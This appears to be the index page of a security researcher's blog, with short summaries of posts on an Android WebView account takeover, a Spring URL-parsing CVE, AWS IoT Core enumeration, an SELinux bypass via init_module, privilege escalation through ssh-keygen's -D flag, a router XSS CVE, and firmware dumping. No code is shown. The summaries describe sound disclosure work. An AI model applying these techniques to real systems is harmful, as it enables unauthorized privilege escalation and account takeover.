Exploiting Android Client WebViews with Help from HSTS

TL;DR

I discovered a one-click account takeover vulnerability in a popular Indonesian Android app called Tokopedia. The chain involves URI parsing issues and custom WebViews, but ultimately it was only exploitable using a payload hosted on a web domain in Google's HSTS preload list. This blog post explores the vulnerability in detail and serves as the public reveal of my free HSTS+HTTPS Redirection service, a useful tool for exploiting URL-parsing vulnerabilities on Android.

[CVE-2024-22243] URL Parsing Vulnerability in Spring Framework

TL;DR

During a routine pentest of a proprietary implementation, I discovered a URL-parsing vulnerability in the Spring Framework that facilitates host confusion, potentially resulting in open redirect or server side request forgery (SSRF). The finding has been officially designated as CVE-2024-22243. Additionally, I created an intentionally-vulnerable example implementation to demonstrate how this vulnerability might be exploited, as well as some Semgrep rules to help developers scan their code for potential vulnerabilities.

AWS IoT Core: A Compromised Device Perspective

TL;DR

I recently spent some time exploring the potential capabilities that an evil IoT device might have within an AWS IoT Core environment. This culminated in the thoughts I've transcribed in this blog post, as well as a command-line tool to help with enumeration and data harvesting during security assessments of products that interact with AWS IoT Core.

Bypassing SELinux with init_module

TL;DR

There are two Linux system calls for loading a kernel module - init_module and finit_module. By leveraging init_module, I bypassed a filesystem-based SELinux rule that prevented me from loading a kernel module through traditional means (e.g., insmod). I then disabled SELinux from kernel-space. Proof of concept code can be found on my GitHub.

Leveraging ssh-keygen for Arbitrary Execution (and Privilege Escalation)

TL;DR

The ssh-keygen command can be used to load a shared library with the -D flag. This can be useful for privilege escalation (described below), or to translate to arbitrary code execution from argument injection, file overwrites, etc. Proof of concept code can be found on my GitHub (and here is a list of other tools that can be leveraged in the same way).

[CVE-2022-45028] Unauthenticated Stored XSS in the Arris NVG443B

Update: I reported this vulnerability to MITRE on November 4th, 2022. It has been assigned CVE-2022-45028 with a CVSS score of 6.1 (Medium).

Adding Support for a Flash Chip in FlashcatUSB

Flash Programmers for Dumping Firmware

Blackbox IoT device hacking can be frustrating without any insight into the underlying software implementation(s). For this reason, I usually try to obtain a copy of the device firmware to extract the bootloader, kernel, root filesystem, and any other information that might inform run-time testing and targeted reverse engineering. Unfortunately, device vendors don't always provide access to firmware packages, and even when they do, the firmware blobs can be encrypted or obfuscated in a way that makes them useless without knowledge of the packaging format. Luckily there's another way to obtain device firmware - you can try to dump it directly from device storage (generally a dedicated flash chip).